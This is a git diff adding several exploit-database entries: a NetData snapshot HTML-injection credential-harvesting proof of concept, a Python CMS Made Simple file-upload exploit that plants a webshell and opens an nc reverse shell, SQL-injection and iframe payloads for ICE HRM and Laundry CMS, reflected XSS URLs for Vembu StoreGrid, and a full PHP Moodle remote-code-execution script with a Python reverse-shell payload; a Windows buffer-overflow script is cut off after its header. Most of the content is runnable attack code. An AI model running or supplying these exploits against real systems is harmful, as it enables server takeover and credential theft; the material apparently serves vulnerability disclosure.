diff --git a/exploits/multiple/webapps/46545.txt b/exploits/multiple/webapps/46545.txt new file mode 100644 index 000000000..86a91d8d2 --- /dev/null +++ b/exploits/multiple/webapps/46545.txt @@ -0,0 +1,49 @@ +# ************************************************************************ +# * Author: Marcelo Vázquez (aka s4vitar) * +# * NetData v1.13.0 HTML Injection Vulnerability * +# ************************************************************************ + +# Exploit Title: NetData v1.13.0 HTML Injection Vulnerability +# Date: 2019-03-14 +# Exploit Author: Marcelo Vázquez (aka s4vitar) +# Collaborators: Victor Lasa (aka vowkin) +# Vendor Homepage: https://my-netdata.io/ +# Software Link: https://docs.netdata.cloud/packaging/installer/ +# Version: <= NetData v1.13.0 +# PoC Video (Credential Harvesting): https://www.youtube.com/watch?v=zSG93yX0B8k + +NetData is prone to multiple HTML-injection vulnerabilities. + +Successful exploitation will allow attacker-supplied HTML to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +NetData 1.13.0 is vulnerable; other versions may also be affected. + +Proof of Concept: +===================== + +1. Export a valid snapshot using the "export/save a netdata snapshot" function from the NetData dashboard (top right on the navigation bar). + +2. Once it has finished exporting, attackers can manipulate the contents of said snapshot file and inject their own malicious HTML code. An example is provided below: + +
Please login with valid credentials:


Please enter your credentials to see the content:

Username:
Password:
+ +In this case, the attackers perform a credential theft attack where they specify the public IP and port from their own server, which is listening for new connections in order to receive the stolen credentials in plain text. + +3. Import the newly modified snapshot using the "import/load a netdata snapshot" function from the NetData dashboard (top right on the navigation bar). + +4. Once imported, the victim will see a login form that asks for their credentials. + +5. After they are entered, the attacker can visualize said credentials in plain text on his own server, as they are sent through a simple GET request: + +root@vps-server:~# nc -nlvp 4646 +Listening on [0.0.0.0] (family 0, port 4646) +Connection from [XX.X.XXX.X] port 4646 [tcp/*] accepted (family 2, sport 36930) +GET /?username=test&password=passwordexample HTTP/1.1 +Host: XXX.XXX.XX.XX:4646 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://localhost:19999/ +Accept-Encoding: gzip, deflate +Accept-Language: es-ES,es;q=0.9,en;q=0.8 \ No newline at end of file diff --git a/exploits/php/webapps/46546.py b/exploits/php/webapps/46546.py new file mode 100755 index 000000000..229714169 --- /dev/null +++ b/exploits/php/webapps/46546.py @@ -0,0 +1,75 @@ +#!/usr/bin/env python +# Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module +# Date: March 2019 +# Exploit Author: Daniele Scanu @ Certimeter Group +# Vendor Homepage: https://www.cmsmadesimple.org/ +# Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2 +# Version: Showtime2 module <= 3.6.2 +# Tested on: CMS Made Simple 2.2.8 in Ubuntu 18.04 +# CVE : 2019-9692 + +import requests +import optparse +from requests_toolbelt.multipart.encoder import MultipartEncoder + +parser = optparse.OptionParser() +parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://192.168.1.10/cms)") +parser.add_option('-U', '--username', action="store", dest="username", help="Username for login", default="admin") +parser.add_option('-P', '--password', action="store", dest="password", help="Password for login", default="password") +parser.add_option('-l', '--local', action="store", dest="local", help="Local uri for reverse shell", default="localhost") +parser.add_option('-p', '--port', action="store", dest="port", help="Local port for reverse shell", default="2222") +options, args = parser.parse_args() + +if not options.url: + print "[-] Specify an uri target" + exit() + +if not options.username: + print "[-] Specify an username for login in administrator panel" + exit() + +if not options.password: + print "[-] Specify a password for login in administrator panel" + exit() + +base_uri = options.url +url_login = base_uri + "/admin/login.php" +user = options.username +password = options.password +session = requests.Session() +__c_var = "" +lhost = options.local +lport = options.port + +# Login in administrator panel for get the csrf token +def login(username, password): + print "[*] Login to cms" + global __c_var + credentials = {"username": username, "password": password, "loginsubmit": "Submit"} + response = session.post(url_login, data=credentials, allow_redirects=False) + __c_var = response.headers['Location'].split("__c=")[1] + print "[*] Token value: " + __c_var + +# upload a php script with reverse shell in vulnerable functionality +def upload_shell(): + print "[*] Uploading webshell" + multipart_data = MultipartEncoder( + fields = { + 'm1_input_browse': ('shell.php', "", 'text/plain'), + '__c': __c_var, + 'mact': 'Showtime2,m1_,defaultadmin,0', + 'm1_upload_submit': 'Upload' + } + ) + response = session.post(base_uri + '/admin/moduleinterface.php', data=multipart_data, + headers={'Content-Type': multipart_data.content_type}) + +# Call the script uploaded for spawn a reverse shell +def spawn_shell(): + print "[*] Spawn a shell to " + lhost + ":" + str(lport) + payload = {"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + lhost + " " + str(lport) + " >/tmp/f"} + requests.post(base_uri + "/uploads/images/shell.php", data=payload) + +login(user, password) +upload_shell() +spawn_shell() \ No newline at end of file diff --git a/exploits/php/webapps/46548.txt b/exploits/php/webapps/46548.txt new file mode 100644 index 000000000..bc093b17d --- /dev/null +++ b/exploits/php/webapps/46548.txt @@ -0,0 +1,69 @@ +=========================================================================================== +# Exploit Title: ICE HRM - ’ob’ SQL Inj. +# Dork: N/A +# Date: 14-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: http://icehrm.org +# Software Link: https://sourceforge.net/projects/icehrm/ +# Version: v23.0 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: ICE Hrm is a Human resource management system for +small and medium sized organizations. + It has a rich UI built with PHP and Java Script. +=========================================================================================== +# POC - SQLi (blind) +# Parameters : ob +# Attack Pattern : +1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f +# POST Method : http://localhost/icehrmv23OS/app/service.php +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: ICE HRM - ’ob’ SQL Inj. +# Dork: N/A +# Date: 14-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: http://icehrm.org +# Software Link: https://sourceforge.net/projects/icehrm/ +# Version: v23.0 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: ICE Hrm is a Human resource management system for +small and medium sized organizations. + It has a rich UI built with PHP and Java Script. +=========================================================================================== +# POC - SQLi (blind) +# Parameters : ob +# Attack Pattern : +1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f +# GET Method : +http://localhost/icehrmv23OS/app/data.php?t=Employee&sm=%7B%22nationality%22:[%22Nationality%22,%22id%22,%22name%22],%22ethnicity%22:[%22Ethnicity%22,%22id%22,%22name%22],%22immigration_status%22:[%22ImmigrationStatus%22,%22id%22,%22name%22],%22employment_status%22:[%22EmploymentStatus%22,%22id%22,%22name%22],%22job_title%22:[%22JobTitle%22,%22id%22,%22name%22],%22pay_grade%22:[%22PayGrade%22,%22id%22,%22name%22],%22country%22:[%22Country%22,%22code%22,%22name%22],%22province%22:[%22Province%22,%22id%22,%22name%22],%22department%22:[%22CompanyStructure%22,%22id%22,%22title%22],%22supervisor%22:[%22Employee%22,%22id%22,%22first_name%20last_name%22]%7D&cl=[%22id%22,%22image%22,%22employee_id%22,%22first_name%22,%22last_name%22,%22mobile_phone%22,%22department%22,%22gender%22,%22supervisor%22]&ft=%7B%22status%22:%22Active%22%7D&ob=1%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f +=========================================================================================== + +=========================================================================================== +# Exploit Title: ICE HRM - ’msg’ Frame Inj. +# Dork: N/A +# Date: 14-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: http://icehrm.org +# Software Link: https://sourceforge.net/projects/icehrm/ +# Version: v23.0 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: ICE Hrm is a Human resource management system for +small and medium sized organizations. +It has a rich UI built with PHP and Java Script. +=========================================================================================== +# POC - Frame Inj. +# Parameters : msg +# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org +%2f%3f%22%3e%3c%2fiframe%3e +# GET Method : +http://localhost/icehrmv23OS/app/fileupload_page.php?id=_id_&msg=&file_group=_file_group_&file_type=_file_type_&user=_user_ +=========================================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/46549.txt b/exploits/php/webapps/46549.txt new file mode 100644 index 000000000..cf86bd6f2 --- /dev/null +++ b/exploits/php/webapps/46549.txt @@ -0,0 +1,22 @@ +# Exploit Title: Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities +# Discovery Date: 2018-12-05 +# Exploit Author: Gionathan "John" Reale +# Vendor Homepage: https://www.vembu.com/ +# Software Link : N/A +# Google Dork: N/A +# Version: 4.4.0 +# CVE : CVE-2014-10078,CVE-2014-10079 +Description StoreGrid enables you to offer an automated online backup service to your customers and is designed to be flexible to your needs. Upon investigating the web interface I discovered multiple vulnerabilities. +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +Information Disclosure. The front page of the server web interface leaks the private IP address in the hidden form "ipaddress" around line 80. +========================================================================================================================== +Reflected XSS. The server web interface contains multiple reflected XSS exploits that do not require authentication. +https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=&result= +https://xxxxxxxx.xx:6061//interface/registercustomer/onlineregsuccess.php?cn=&result= +https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=&result= +https://xxxxxxxxx.xx:6061/interface/registerreseller/onlineregfailure.php?cn=gar&result= +https://xxxxxxxxx.xx:6061/interface/registerclient/onlineregfailure.php?cn=gar&result= +https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregfailure.php?cn=gar&result= +============================================================================================================================= +Self XSS. The server web interface contains a self XSS in the search function. +============================================================================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/46550.txt b/exploits/php/webapps/46550.txt new file mode 100644 index 000000000..2342a1e13 --- /dev/null +++ b/exploits/php/webapps/46550.txt @@ -0,0 +1,126 @@ +=========================================================================================== +# Exploit Title: Laundry CMS cloth_code SQL Inj. +# Dork: N/A +# Date: 09-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: http://laundry.rpcits.co.in/ +# Software Link: https://sourceforge.net/projects/laundry/ +# Version: New +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: The Laundry Management Application is a very +simple and Online Services + with mobile and computer friendly themes development. +=========================================================================================== +# POC - SQLi +# Parameters : cloth_code, cloth_name +# Attack Pattern : %2527 +# POST Method : http://localhost/laundry/index.php/admin/cloth_crud/create +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: Laundry CMS Multiple SQL Inj. +# Dork: N/A +# Date: 09-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: http://laundry.rpcits.co.in/ +# Software Link: https://sourceforge.net/projects/laundry/ +# Version: New +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: The Laundry Management Application is a very +simple and Online Services + with mobile and computer friendly themes development. +=========================================================================================== +# POC - SQLi +# Parameters : last_name, password, email, phone, first_name, status, +join_date, address, +# Attack Pattern : %2527 +# POST Method : http://localhost/laundry/index.php/admin/customer_crud/create +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: Laundry CMS Multiple SQL Inj. +# Dork: N/A +# Date: 09-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: http://laundry.rpcits.co.in/ +# Software Link: https://sourceforge.net/projects/laundry/ +# Version: New +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: The Laundry Management Application is a very +simple and Online Services + with mobile and computer friendly themes development. +=========================================================================================== +# POC - SQLi +# Parameters : last_name, password, email, phone, first_name, status, +join_date, address, gender +# Attack Pattern : %2527 +# POST Method : http://localhost/laundry/index.php/admin/employee_crud/new +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: Laundry CMS expse_code SQL Inj. +# Dork: N/A +# Date: 09-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: http://laundry.rpcits.co.in/ +# Software Link: https://sourceforge.net/projects/laundry/ +# Version: New +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: The Laundry Management Application is a very +simple and Online Services + with mobile and computer friendly themes development. +=========================================================================================== +# POC - SQLi +# Parameters : expse_code, expse_type, expse_id +# Attack Pattern : %2527 +# POST Method : http://localhost/laundry/index.php/admin/expenses_crud/create +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: Laundry CMS service_code SQL Inj. +# Dork: N/A +# Date: 09-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: http://laundry.rpcits.co.in/ +# Software Link: https://sourceforge.net/projects/laundry/ +# Version: New +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: The Laundry Management Application is a very +simple and Online Services + with mobile and computer friendly themes development. +=========================================================================================== +# POC - SQLi +# Parameters : service_code, service_name +# Attack Pattern : %2527 +# POST Method : http://localhost/laundry/index.php/admin/service_crud/create +=========================================================================================== + +=========================================================================================== +# Exploit Title: Laundry CMS Multiple Frame Inj. +# Dork: N/A +# Date: 09-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: http://laundry.rpcits.co.in/ +# Software Link: https://sourceforge.net/projects/laundry/ +# Version: New +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: The Laundry Management Application is a very simple and Online Services + with mobile and computer friendly themes development. +=========================================================================================== +# POC - Frame Inj. +# Parameters : cloth_name, service_name, expse_type +# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org%2f%3f%22%3e%3c%2fiframe%3e +# POST Method : http://localhost/laundry/index.php/admin/service_crud/create +=========================================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/46551.php b/exploits/php/webapps/46551.php new file mode 100644 index 000000000..0fd18bf6f --- /dev/null +++ b/exploits/php/webapps/46551.php @@ -0,0 +1,512 @@ + php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 + * + * user The account username + * pass The password to the account + * ip Callback IP + * port Callback Port + * course Valid course ID belonging to the teacher + * + * Make sure you're running a netcat listener on the specified port before + * executing this script. + * + * > nc -lnvp 1010 + * + * This will attempt to open up a reverse shell to the listening IP and port. + * + * You can start the script with `debug=true` to enable debug mode. + */ +namespace exploit { + class moodle { + public $ip; + public $port; + public $courseId; + + public $cookie_jar; + public $url; + public $pass; + public $payload; + public $quizId = false; + + public $moodleSession = false; + public $moodleKey; + + // Verification patterns + public $loginSuccessMatch = "/course.view\.php/"; + public $courseSuccessMatch = "/.\/i.Edit.settings.\/a./"; + public $editSuccessMatch = "/.view.php\?id=2¬ifyeditingon=1/"; + public $quizSuccessMatch = "/.title.Editing.Quiz.\/title./"; + public $quizConfigMatch = "/title.*xxxx.\/title./"; + public $evilSuccess = "/The\ wild\ cards\ \\{x..\}\<\/strong\>\ will\ be\ substituted/"; + + public $debug; + + public function __construct($url, $user, $pass, $ip, $port, $course, $debug) { + $this->cookie_jar = tempnam("/tmp","cookie"); + $this->url = $url; + $this->pass = $pass; + $this->ip = $ip; + $this->port = $port; + $this->courseId = $course; + $this->debug = $debug; + + // Inject a reverse shell + // You could modify this payload to inject whatever you like + $this->payload = "(python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"".$this->ip."\",".$this->port."))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b')"; + + echo("\n\r"); + echo("*------------------------------*\n\r"); + echo("* Noodle [Moodle RCE] (v3.4.1) *\n\r"); + echo("*------------------------------*\n\r"); + echo("\n\r"); + echo("[!] Make sure you have a listener\n\r"); + echo(sprintf("[!] at %s:%s\n\r", $this->ip, $this->port)); + echo("\n\r"); + + $this->login($url, $user, $pass); + $this->loadCourse($this->courseId); + $this->enableEdit(); + $this->addQuiz(); + $this->editQuiz(); + $this->addCalculatedQuestion(); + $this->addEvilQuestion(); + $this->exploit(); + echo "[*] DONE\n\r"; + die(); + } + + function login($url, $user, $pass) { + echo(sprintf("[*] Logging in as user %s with password %s \n\r", $user, $pass)); + + $data = [ + "anchor" => "", + "username" => $user, + "password" => $pass + ]; + + $result = $this->httpPost("/login/index.php", $data); + + if (!preg_match($this->loginSuccessMatch, $result["body"])) { + echo "[-] LOGIN FAILED!\n\r"; + echo "[?] Do you have the right credentials and url?\n\r"; + die(); + } + + $matches = []; + $cookies = preg_match_all("/MoodleSession=(.*); path=/", $result["header"], $matches); + + $this->moodleSession = $matches[1][1]; + + $matches = []; + $key = preg_match_all("/sesskey\":\"(.*)\",\"themerev/", $result["body"], $matches); + + $this->moodleKey = $matches[1][0]; + + echo "[+] Successful Login\n\r"; + echo sprintf("[>] Moodle Session %s \n\r", $this->moodleSession); + echo sprintf("[>] Moodle Key %s \n\r", $this->moodleKey); + } + + function loadCourse($id) { + echo(sprintf("[*] Loading Course ID %s \n\r", $id)); + $result = $this->httpGet(sprintf("/course/view.php?id=%s", $id), $this->moodleSession); + + if (!preg_match($this->courseSuccessMatch, $result["body"])) { + echo "[-] LOADING COURSE FAILED!\n\r"; + echo "[?] Does the course exist and belong to the teacher?\n\r"; + die(); + } + + echo "[+] Successfully Loaded Course\n\r"; + } + + function enableEdit() { + echo(sprintf("[*] Enable Editing\n\r")); + $result = $this->httpGet(sprintf( + "/course/view.php?id=%s&sesskey=%s&edit=on", + $this->courseId, + $this->moodleKey + ), $this->moodleSession); + + if (!preg_match($this->editSuccessMatch, $result["header"])) { + echo "[-] ENABLE EDITING FAILED!\n\r"; + echo "[?] Does the user have the teacher role?\n\r"; + die(); + } + + echo "[+] Successfully Enabled Course Editing\n\r"; + } + + function addQuiz() { + echo(sprintf("[*] Adding Quiz\n\r")); + + $data = [ + "course" => $this->courseId, + "sesskey" => $this->moodleKey, + "jump" => urlencode(sprintf( + "/course/mod.php?id=%s&sesskey=%s&str=0&add=quiz§ion=0", + $this->courseId, + $this->moodleKey + )), + ]; + + $result = $this->httpPost("/course/jumpto.php", $data, $this->moodleSession); + + if (!preg_match($this->quizSuccessMatch, $result["body"])) { + echo "[-] ADD QUIZ FAILED!\n\r"; + die(); + } + + echo "[+] Successfully Added Quiz\n\r"; + echo "[*] Configuring New Quiz\n\r"; + + $submit = [ + "grade" => 10, + "boundary_repeats" => 1, + "completionunlocked" => 1, + "course" => $this->courseId, + "coursemodule" => "", + "section" => 0, + "module" => 16, + "modulename" => "quiz", + "instance" => "", + "add" => "quiz", + "update" => 0, + "return" => 0, + "sr" => 0, + "sesskey" => $this->moodleKey, + "_qf__mod_quiz_mod_form" => 1, + "mform_showmore_id_layouthdr" => 0, + "mform_showmore_id_interactionhdr" => 0, + "mform_showmore_id_display" => 0, + "mform_showmore_id_security" => 0, + "mform_isexpanded_id_general" => 1, + "mform_isexpanded_id_timing" => 0, + "mform_isexpanded_id_modstandardgrade" => 0, + "mform_isexpanded_id_layouthdr" => 0, + "mform_isexpanded_id_interactionhdr" => 0, + "mform_isexpanded_id_reviewoptionshdr" => 0, + "mform_isexpanded_id_display" => 0, + "mform_isexpanded_id_security" => 0, + "mform_isexpanded_id_overallfeedbackhdr" => 0, + "mform_isexpanded_id_modstandardelshdr" => 0, + "mform_isexpanded_id_availabilityconditionsheader" => 0, + "mform_isexpanded_id_activitycompletionheader" => 0, + "mform_isexpanded_id_tagshdr" => 0, + "mform_isexpanded_id_competenciessection" => 0, + "name" => "xxxx", + "introeditor[text]" => "

xxxx

", + "introeditor[format]" => 1, + "introeditor[itemid]" => 966459952, + "showdescription" => 0, + "overduehandling" => "autosubmit", + "gradecat" => 1, + "gradepass" => "", + "attempts" => 0, + "grademethod" => 1, + "questionsperpage" => 1, + "navmethod" => "free", + "shuffleanswers" => 1, + "preferredbehaviour" => "deferredfeedback", + "attemptonlast" => 0, + "attemptimmediately" => 1, + "correctnessimmediately" => 1, + "marksimmediately" => 1, + "specificfeedbackimmediately" => 1, + "generalfeedbackimmediately" => 1, + "rightanswerimmediately" => 1, + "overallfeedbackimmediately" => 1, + "attemptopen" => 1, + "correctnessopen" => 1, + "marksopen" => 1, + "specificfeedbackopen" => 1, + "generalfeedbackopen" => 1, + "rightansweropen" => 1, + "overallfeedbackopen" => 1, + "showuserpicture" => 0, + "decimalpoints" => 2, + "questiondecimalpoints" => -1, + "showblocks" => 0, + "quizpassword" => "", + "subnet" => "", + "browsersecurity" => "-", + "feedbacktext[0][text]" => "", + "feedbacktext[0][format]" => 1, + "feedbacktext[0][itemid]" => 754687559, + "feedbackboundaries[0]" => "", + "feedbacktext[1][text]" => "", + "feedbacktext[1][format]" => 1, + "feedbacktext[1][itemid]" => 88204176, + "visible" => 1, + "cmidnumber" => "", + "groupmode" => 0, + "availabilityconditionsjson" => urlencode("{\"op\":\"&\",\"c\":[],\"showc\":[]}"), + "completion" => 1, + "tags" => "_qf__force_multiselect_submission", + "competency_rule" => 0, + "submitbutton" => "Save and display" + ]; + + $result = $this->httpPost("/course/modedit.php", $submit, $this->moodleSession); + + if (!preg_match($this->quizConfigMatch, $result["body"])) { + echo "[-] CONFIGURE QUIZ FAILED!\n\r"; + die(); + } + + $matches = []; + $quiz = preg_match_all("/quiz\/view.php.id=(.*)&forceview=1/", $result["header"], $matches); + + $this->quizId = $matches[1][0]; + + echo "[+] Successfully Configured Quiz\n\r"; + } + + function editQuiz() { + echo(sprintf("[*] Loading Edit Quiz Page \n\r")); + $result = $this->httpGet(sprintf("/mod/quiz/edit.php?cmid=%s", $this->quizId), $this->moodleSession); + + if (!preg_match("/.title.Editing quiz: xxxx.\/title/", $result["body"])) { + echo "[-] LOADING EDITING PAGE FAILED!\n\r"; + die(); + } + + echo "[+] Successfully Loaded Edit Quiz Page\n\r"; + } + + function addCalculatedQuestion() { + echo(sprintf("[*] Adding Calculated Question \n\r")); + + $endpoint = "/question/question.php?courseid=".$this->courseId."&sesskey=".$this->moodleKey."&qtype=calculated&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D".$this->quizId."%26addonpage%3D0&cmid=".$this->quizId."&category=2&addonpage=0&appendqnumstring=addquestion'"; + + $result = $this->httpGet($endpoint, $this->moodleSession); + + if (!preg_match("/title.Editing\ a\ Calculated\ question.\/title/", $result["body"])) { + echo "[-] ADDING CALCULATED QUESTION FAILED!\n\r"; + die(); + } + + echo "[+] Successfully Added Calculation Question\n\r"; + } + + function addEvilQuestion() { + echo(sprintf("[*] Adding Evil Question \n\r")); + + $payload = [ + "initialcategory" => 1, + "reload" => 1, + "shuffleanswers" => 1, + "answernumbering" => "abc", + "mform_isexpanded_id_answerhdr" => 1, + "noanswers" => 1, + "nounits" => 1, + "numhints" => 2, + "synchronize" => "", + "wizard" => "datasetdefinitions", + "id" => "", + "inpopup" => 0, + "cmid" => $this->quizId, + "courseid" => 2, + "returnurl" => sprintf("/mod/quiz/edit.php?cmid=%s&addonpage=0", $this->quizId), + "scrollpos" => 0, + "appendqnumstring" => "addquestion", + "qtype" => "calculated", + "makecopy" => 0, + "sesskey" => $this->moodleKey, + "_qf__qtype_calculated_edit_form" => 1, + "mform_isexpanded_id_generalheader" => 1, + "mform_isexpanded_id_unithandling" => 0, + "mform_isexpanded_id_unithdr" => 0, + "mform_isexpanded_id_multitriesheader" => 0, + "mform_isexpanded_id_tagsheader" => 0, + "category" => "2,23", + "name" => "zzzz", + "questiontext[text]" => "

zzzz

", + "questiontext[format]" => 1, + "questiontext[itemid]" => 999787569, + "defaultmark" => 1, + "generalfeedback[text]" => "", + "generalfeedback[format]" => 1, + "generalfeedback[itemid]" => 729029157, + "answer[0]" => ' /*{a*/`$_GET[0]`;//{x}}', + "fraction[0]" => "1.0", + "tolerance[0]" => "0.01", + "tolerancetype[0]" => 1, + "correctanswerlength[0]" => 2, + "correctanswerformat[0]" => 1, + "feedback[0][text]" => "", + "feedback[0][format]" => 1, + "feedback[0][itemid]" => 928615051, + "unitrole" => 3, + "penalty" => "0.3333333", + "hint[0]text]" => "", + "hint[0]format]" => 1, + "hint[0]itemid]" => 236679070, + "hint[1]text]" => "", + "hint[1]format]" => 1, + "hint[1]itemid]" => 272691514, + "tags" => "_qf__force_multiselect_submission", + "submitbutton" => "Save change" + ]; + + $result = $this->httpPost("/question/question.php", $payload, $this->moodleSession); + + if (!preg_match($this->evilSuccess, $result["body"])) { + echo "[-] EVIL QUESTION CREATION FAILED!\n\r"; + die(); + } + + echo "[+] Successfully Created Evil Question\n\r"; + } + + function exploit() { + echo "[*] Sending Exploit\n\r"; + echo "\n\r"; + + if ($this->debug) { + echo "[D] Payload: \n\r"; + echo sprintf("[>] %s \n\r", $this->payload); + } + + $exploitUrl = sprintf( + "/question/question.php?returnurl=%s&addonpage=0&appendqnumstring=addquestion&scrollpos=0&id=8&wizardnow=datasetitems&cmid=%s&0=(%s)", + urlencode(sprintf( + "/mod/quiz/edit.php?cmid=%s", + $this->quizId) + ), + $this->quizId, + $this->payload); + + if ($this->debug) { + echo sprintf("[D] Exploit URL: %s \n\r", $exploitUrl); + } + + echo sprintf("[>] You should receive a reverse shell attempt from the target at %s on port %s \n\r", $this->ip, $this->port); + echo sprintf("[>] If connection was successful this program will wait here until you close the connection.\n\r"); + echo sprintf("[>] You should be able to Ctrl+C and retain the connection through netcat.\n\r"); + $this->httpGet($exploitUrl, $this->moodleSession); + } + + function httpPost($url, $data, $session = false, $json = false) + { + if ($this->debug) { + echo(sprintf("[D] Doing HTTP POST to URL: %s \n\r", $url)); + echo(sprintf("[D] Session: %s \n\r", $session)); + echo(sprintf("[D] Data: %s \n\r", json_encode($data))); + echo("\n\r"); + } + + $curl = curl_init(sprintf("%s%s", $this->url, $url)); + + $headers = []; + + if ($session) { + array_push($headers, sprintf("Cookie: MoodleSession=%s", $session)); + } + + if ($json) { + array_push($headers, "Content-Type: application/json"); + } else { + $data = urldecode(http_build_query($data)); + } + + curl_setopt($curl, CURLOPT_POST, true); + curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); + curl_setopt($curl, CURLOPT_POSTFIELDS, $data); + curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); + curl_setopt($curl, CURLOPT_HEADER, true); + curl_setopt($curl, CURLOPT_COOKIEJAR, $this->cookie_jar); + curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); + $response = curl_exec($curl); + + $header_size = curl_getinfo($curl, CURLINFO_HEADER_SIZE); + $header = substr($response, 0, $header_size); + $body = substr($response, $header_size); + + if ($this->debug) { + echo "[D] Response Header"; + echo sprintf("[>] %s", $header); + echo ""; + echo "[D] Response Body"; + echo sprintf("[>] %s", $body); + } + + return [ + "header" => $header, + "body" => $body + ]; + } + + function httpGet($route, $session = false) + { + $url = sprintf("%s%s", $this->url, $route); + + if ($this->debug) { + echo(sprintf("[D] Doing HTTP GET to URL: %s \n\r", $url)); + echo("\n\r"); + } + + $headers = []; + + if ($session) { + array_push($headers, sprintf("Cookie: MoodleSession=%s", $session)); + } + + $curl = curl_init($url); + + curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); + curl_setopt($curl, CURLOPT_HEADER, true); + curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); + curl_setopt($curl, CURLOPT_COOKIEJAR, $this->cookie_jar); + curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); + $response = curl_exec($curl); + + $header_size = curl_getinfo($curl, CURLINFO_HEADER_SIZE); + $header = substr($response, 0, $header_size); + $body = substr($response, $header_size); + + if ($this->debug) { + echo "[D] Response Header"; + echo sprintf("[>] %s", $header); + echo ""; + echo "[D] Response Body"; + echo sprintf("[>] %s", $body); + } + + return [ + "header" => $header, + "body" => $body + ]; + } + } + + parse_str(implode("&", array_slice($argv, 1)), $_GET); + + $url = $_GET["url"]; + $user = $_GET["user"]; + $pass = $_GET["pass"]; + $ip = $_GET["ip"]; + $port = $_GET["port"]; + $course = $_GET["course"]; + $debug = isset($_GET["debug"]) ? true : false; + + new \exploit\moodle($url, $user, $pass, $ip, $port, $course, $debug); +} \ No newline at end of file diff --git a/exploits/windows/remote/46547.py b/exploits/windows/remote/46547.py new file mode 100755 index 000000000..8f0a0cf40 --- /dev/null +++ b/exploits/windows/remote/46547.py @@ -0,0 +1,111 @@ +# Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow +# Date: March 14, 2019 +# Exploit Author: Joseph McDonagh +# Vendor Homepage: N/A +# Software Link: N/A +# Version: Mail Carrier 2.5.1 +# Tested on: Windows Vista Home Basic SP2 +# CVE: None + + +#!/usr/bin/python +# +# This script started from PWK, Chapter 6 +# I am re-purposing it Tabs Mail Carrier 2.5.1 OSCE practice +# During testing, I found the MAIL FROM: is also vulnerable to Buffer Overflow +# Thanks to the original authors of the EHLO parameter, gave me the +starting point and nudge I needed +# +# Usage ./tabs_mail.pwn.py 192.168.1.66 +# Bind shell on TCP port 19397 +# Tested on Windows Vista Home Basic SP 2 + +import 